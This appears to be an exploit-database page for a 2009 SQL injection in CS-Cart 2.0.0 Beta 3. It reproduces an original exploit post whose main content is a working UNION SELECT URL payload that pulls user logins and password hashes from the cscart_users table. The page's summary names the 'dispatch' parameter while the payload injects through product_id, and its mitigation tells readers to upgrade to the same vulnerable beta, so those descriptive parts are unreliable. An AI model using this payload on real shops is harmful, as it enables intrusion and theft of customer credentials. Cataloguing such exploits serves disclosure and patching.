header-logo
Suggest Exploit
vendor:
CS-Cart
by:
netsoul
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: CS-Cart
Affected Version From: 2.0.0 Beta 3 (dispatch)
Affected Version To: 2.0.0 Beta 3 (dispatch)
Patch Exists: YES
Related CWE: N/A
CPE: a:cs-cart:cs-cart:2.0.0_beta_3_(dispatch)
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

CS-Cart 2.0.0 Beta 3 (dispatch) SQL Injection Vulnerability

A SQL injection vulnerability exists in CS-Cart 2.0.0 Beta 3 (dispatch) which allows an attacker to execute arbitrary SQL commands via the 'dispatch' parameter in the 'index.php' script. An attacker can exploit this vulnerability to gain access to sensitive information such as usernames and passwords.

Mitigation:

Upgrade to the latest version of CS-Cart 2.0.0 Beta 3 (dispatch) or apply the appropriate patch.
Source

Exploit-DB raw data:

CS-Cart 2.0.0 Beta 3 (dispatch) SQL Injection Vulnerability
Provider: www.cs-cart.com
Discovered by netsoul
Greetz: m1cr0n, IvanKalet, blackfalcon, str0ke
Contact: netsoul2[at]gmail.com
ALTO PARANA - PARAGUAY
Ñane mba'e teete
#####################################################

Exploit:

http://cs-cart cms/[path]/index.php?dispatch=products.view&product_id=289' UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,concat(user_login,0x3a,password),0,0 from cscart_users/*


#####################################################

# milw0rm.com [2009-03-09]

Navigation

Suggest Exploit

Services By CQR